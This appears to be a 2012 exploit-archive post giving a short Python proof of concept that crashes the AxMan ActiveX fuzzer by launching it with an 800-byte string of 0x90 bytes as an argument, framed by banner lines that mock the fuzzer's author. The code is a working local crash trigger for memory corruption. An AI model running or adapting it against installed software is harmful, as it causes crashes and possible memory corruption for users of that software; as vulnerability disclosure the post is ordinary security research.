Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
Crash : http://imageshack.us/f/217/axman.jpg/
Date: July 28, 2012
Author: coolkaveh
coolkaveh () rocketmail com
Https://twitter.com/coolkaveh
Vendor Homepage: http://digitaloffense.net/tools/axman/
version : 1.0.0
Tested on: windows 7 SP1
========================================================
Crash The Exploiter
Lame HD Moore fuzzer Memory Corruption
By Awsome coolkaveh
-------------------------------------------------------------------------------------------------------
import os
import win32api
crash = " Crash The Exploiter "
lame=" Lame HD Moore fuzzer Memory corruption "
awsome=" By Awsome coolkaveh "
print
print
print
print crash
print
print lame
print
print awsome
print
print
print
print
exploit = ("\x90" *800)
win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)